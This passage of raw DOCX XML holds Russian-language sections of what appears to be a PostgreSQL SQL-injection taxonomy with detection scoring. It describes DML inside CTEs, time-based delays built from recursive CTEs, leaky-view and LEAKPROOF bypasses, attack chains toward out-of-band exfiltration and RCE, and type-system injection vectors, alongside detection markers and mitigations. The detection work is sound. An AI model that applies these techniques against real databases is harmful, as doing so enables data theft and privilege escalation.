          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Большие N — индикатор time-based attack. Возможны false-positives на legitimate reporting (даты, batch-inserts), но контекстная редкость.</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cte_not_materialized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сам keyword легитимен (performance hint в complex reporting), false-positive-rate выше, чем у других. Маркер только в комбинации с view-доступом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">risk сопоставим с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (9-10) и выше </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FILTER_BYPASS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (6-8), потому что 3.10 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сама атака</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а не транспорт (3.9) и не разведка (3.8). Финальное решение об инциденте — LLM-судья по совокупности маркеров.</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R22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Data-Modifying CTE: PostgreSQL Docs «WITH Queries — Data-Modifying Statements», основа 3.10.1.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Общие:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostgreSQL Docs (WITH Queries — Recursive, Materialization; Rules and Privileges — security_barrier; CREATE FUNCTION — LEAKPROOF, COST), PortSwigger SQLi cheat sheet, HackTricks PostgreSQL Injection, OWASP ReDoS (для 3.10.2 Payload C), Tom Lane / Andres Freund-context для leaky-views и CTE-inlining changes в PG 12.</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(Time-based blind)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.10.2 — альтернативные delay-примитивы. Без 3.10.2 в WAF-окружениях 3.4 не проходит, потому что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блокируется.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главное противопоставление. 3.10.1 — single-command write, 3.5 — multi-command. 3.10.1 надёжнее на современных стэках.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 (OOB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.10.1-CTE + OOB-функция (dblink, postgres_fdw) в одной команде. CTE-обёртка ничего не добавляет к OOB-механике, но упаковывает write+exfil атомарно.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 (RCE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.10.1 + COPY FROM PROGRAM не пересекаются (COPY не разрешён в CTE), но 3.10.1 → 3.7.2/3.7.3 через цепочку write-в-config + reload.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 (Metadata)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.10.2 — основной канал blind-разведки, когда HTTP-ответ не возвращает данные напрямую (3.8 разрабатывает payload-ы, 3.10.2 даёт oracle-примитив).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(Filter bypass)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.10.2 — обход WAF-блокировки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3.10.x в целом часто комбинируется с 3.9.6 (whitespace tricks) для маскировки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-ключевого слова.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3.10.1 UPDATE role='admin' — privilege escalation на application-уровне; 3.13 — на PG-уровне. 3.10.3 Payload C требует SUPERUSER (получить через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leaky-функция из 3.10.3 — обычно plpgsql, в её prosrc может быть identifier-injection-вектор по тем же правилам 3.16.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3.17.2 (RLS bypass через MERGE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пересечение с 3.10.1: MERGE в CTE — двойная цепочка bypass-а (extended-protocol + RLS).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(Validation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практический ответ на 3.10: read-only роль для read-эндпоинтов, AST-based SQL-validation для блока DML-в-CTE, security_barrier=on на ACL-view, statement_timeout для защиты от 3.10.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.10 — категория про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">core SQL semantics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: CTE, recursive, materialization, security_barrier, LEAKPROOF, COST. Все эти механизмы — часть PostgreSQL core; managed-провайдеры их не модифицируют и не отключают. Что специфично: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3.10.1 DML в CTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — работает идентично self-hosted. Provider не вмешивается; ограничение только на привилегиях application-роли (RDS / Cloud SQL / Supabase предоставляют separate read-only roles для opt-in защиты).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3.10.2 Recursive CTE / generate_series</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — лимит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">work_mem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обычно повышен на managed (для performance), что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">расширяет</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возможности time-oracle.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дефолт у провайдеров: RDS — нет дефолта (DBA устанавливает); Cloud SQL — нет; Supabase — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">30s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для anon-роли. Атакующий калибрует N под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 если он 30s, payload N=5M (3-4s) проходит надёжно.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3.10.3 Leaky views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security_barrier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> устанавливается на view через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER VIEW ... SET (security_barrier = true)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Managed-провайдеры предоставляют этот ALTER без ограничений. На provider-managed views (если provider предоставляет встроенные view, например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cloudsqladmin.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — security_barrier обычно установлен правильно. Custom user-views — на ответственности DBA приложения.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`LEAKPROOF` функции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — требуют SUPERUSER. На managed-PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">никакая роль не получает SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (включая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Это значит, что Payload C (3.10.3) на managed-провайдере </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">структурно невозможен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий не может создать LEAKPROOF-функцию, даже если контролирует application-роль полностью. Это значимая защита managed-окружения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Итоговая картина для managed: 3.10.1 и 3.10.2 работают идентично self-hosted. 3.10.3 в варианте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">direct leak (Payload A) и NOT MATERIALIZED-обход (Payload B)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> работают так же; только LEAKPROOF-обход (Payload C) недоступен без SUPERUSER, что косвенно защищает managed от 3.10.3 при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">security_barrier=on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. На views с дефолтным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">security_barrier=off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (большинство user-views) Payload A работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Детально по провайдерам — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для самостоятельной разведки statement_timeout / security_barrier на текущем кластере — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SHOW statement_timeout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SELECT relname, reloptions FROM pg_class WHERE relkind='v'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (доступно PUBLIC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.11.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.11 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">специфику системы типов PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как поверхности атаки. В отличие от 3.1 (UNION) и 3.6 (OOB), где payload эксплуатирует синтаксическую структуру запроса, здесь payload работает через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">семантику типов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: implicit coercion, type-specific операторы, парсинг строк в специализированные типы (boolean, jsonb, xml), driver-уровневое маршалирование scalar↔array.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL имеет одну из самых сложных систем типов среди реляционных СУБД (см. 2.4 — типы и cast-правила). Это создаёт несколько классов уязвимостей, которые не сводимы к стандартным паттернам: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Implicit text→boolean coercion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> позволяет инжектировать в bool-контексты без необходимости в кавычках (3.11.1).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jsonb-операторы `-&gt;` / `-&gt;&gt;` / `@@`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> интерпретируют user-controlled строки как JSONPath/JSON keys, открывая отдельный язык DSL для injection (3.11.2).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`xpath()` и XML-функции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> парсят user-input как XPath 1.0 — полноценный query-language с собственными функциями утечки (3.11.3).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 ANY($1)` vs `IN (...)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеют разную семантику для драйверного маршалирования; некоторые драйверы передают scalar там, где код ожидал array, что создаёт type-confusion (3.11.4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Общая модель уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код для всех 3.11.x работает по схожему паттерну: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
